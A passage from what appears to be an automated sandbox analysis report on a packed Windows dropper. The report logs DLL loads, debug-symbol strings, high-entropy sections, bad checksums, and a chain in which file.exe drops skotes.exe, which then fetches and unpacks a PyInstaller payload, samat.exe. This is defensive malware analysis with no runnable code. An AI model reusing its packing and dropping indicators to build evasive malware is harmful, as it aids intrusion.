                    Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: file.exeStatic file information: File size 1927680 > 1048576
                    Source: file.exeStatic PE information: Raw size of fjmpujlc is bigger than: 0x100000 < 0x1a4c00
                    Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4574676544.00007FF8B8327000.00000002.00000001.01000000.0000001E.sdmp
                    Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
                    Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
                    Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb** source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
                    Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: samat.exe, 00000008.00000002.4568570169.00007FF8A8792000.00000002.00000001.01000000.00000015.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp
                    Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb!! source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585287094.00007FF8B9843000.00000002.00000001.01000000.00000017.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: samat.exe, 00000008.00000002.4587381995.00007FF8BFAC3000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585606922.00007FF8B9F66000.00000002.00000001.01000000.00000014.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: samat.exe, 00000008.00000002.4583959875.00007FF8B9162000.00000002.00000001.01000000.00000012.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585930207.00007FF8B9F73000.00000002.00000001.01000000.00000013.sdmp
                    Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586952230.00007FF8BA51D000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584962997.00007FF8B93C9000.00000002.00000001.01000000.00000016.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: samat.exe, 00000008.00000002.4582141897.00007FF8B90FF000.00000002.00000001.01000000.0000001A.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: D:\a\1\b\libssl-3.pdb source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: samat.exe, 00000008.00000002.4582488584.00007FF8B911E000.00000002.00000001.01000000.00000018.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.6c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;
                    Source: VCRUNTIME140.dll.7.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7E8DE80 GetModuleHandleW,LoadLibraryW,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree,8_2_00007FF8B7E8DE80
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: _ghash_clmul.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xac61
                    Source: _pkcs1_decode.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x10c34
                    Source: _raw_eksblowfish.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xca96
                    Source: _chacha20.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x351a
                    Source: _SHA384.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x1655d
                    Source: _raw_cast.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xc443
                    Source: md.cp313-win_amd64.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x47a9
                    Source: _modexp.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x172cd
                    Source: skotes.exe.0.drStatic PE information: real checksum: 0x1da666 should be: 0x1e3c3d
                    Source: _SHA256.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x6eb8
                    Source: _cffi_backend.cp313-win_amd64.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x2f4d9
                    Source: _raw_ecb.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x4671
                    Source: _BLAKE2s.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x5f6b
                    Source: _cpuid_c.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xdccc
                    Source: _SHA1.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xf079
                    Source: _SHA224.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x1037a
                    Source: _MD2.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xeba3
                    Source: _scrypt.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x4714
                    Source: _raw_des3.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x1d746
                    Source: _RIPEMD160.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x69e1
                    Source: _raw_ctr.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xdcf9
                    Source: _ec_ws.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xbf2b1
                    Source: pywintypes313.dll.7.drStatic PE information: real checksum: 0x0 should be: 0x21b11
                    Source: _keccak.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xdc9d
                    Source: file.exeStatic PE information: real checksum: 0x1da666 should be: 0x1e3c3d
                    Source: _Salsa20.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xb9f9
                    Source: _raw_arc2.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x13220
                    Source: _curve448.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x1a70d
                    Source: _ARC4.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x9b3a
                    Source: _raw_aes.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xbec9
                    Source: _MD4.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x9e2d
                    Source: _strxor.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x48ff
                    Source: _ghash_portable.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xe5b7
                    Source: _raw_cfb.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xed0d
                    Source: md__mypyc.cp313-win_amd64.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x1ee46
                    Source: _curve25519.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x1023e
                    Source: _poly1305.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xbf54
                    Source: _ed25519.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x10701
                    Source: _BLAKE2b.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x120c3
                    Source: _SHA512.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xdf25
                    Source: _MD5.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xa544
                    Source: _raw_aesni.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x646e
                    Source: win32crypt.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x22ce5
                    Source: _ed448.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x1eae6
                    Source: _raw_des.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x13f62
                    Source: _raw_ofb.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x10ea2
                    Source: _raw_blowfish.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xe4b7
                    Source: _raw_ocb.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x11289
                    Source: _raw_cbc.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x5ba2
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: fjmpujlc
                    Source: file.exeStatic PE information: section name: jlhbczjq
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: fjmpujlc
                    Source: skotes.exe.0.drStatic PE information: section name: jlhbczjq
                    Source: skotes.exe.0.drStatic PE information: section name: .taggant
                    Source: VCRUNTIME140.dll.7.drStatic PE information: section name: fothk
                    Source: VCRUNTIME140.dll.7.drStatic PE information: section name: _RDATA
                    Source: libcrypto-3.dll.7.drStatic PE information: section name: .00cfg
                    Source: libssl-3.dll.7.drStatic PE information: section name: .00cfg
                    Source: python313.dll.7.drStatic PE information: section name: PyRuntim
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B802267D push rbx; retf 8_2_00007FF8B8022685
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80227AE push rsp; iretd 8_2_00007FF8B80227B9
                    Source: file.exeStatic PE information: section name: entropy: 7.982732781787212
                    Source: file.exeStatic PE information: section name: fjmpujlc entropy: 7.954406052797792
                    Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.982732781787212
                    Source: skotes.exe.0.drStatic PE information: section name: fjmpujlc entropy: 7.954406052797792

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_overlapped.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des3.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_strxor.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_asyncio.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve448.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cfb.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aes.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ocb.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA224.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_poly1305.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_arc2.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ecb.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_RIPEMD160.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ctr.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD2.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\unicodedata.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_keccak.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Protocol\_scrypt.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\python313.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\select.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA1.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\libffi-8.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140_1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Math\_modexp.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_chacha20.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI52282\sqlite3.dllJump to dropped file
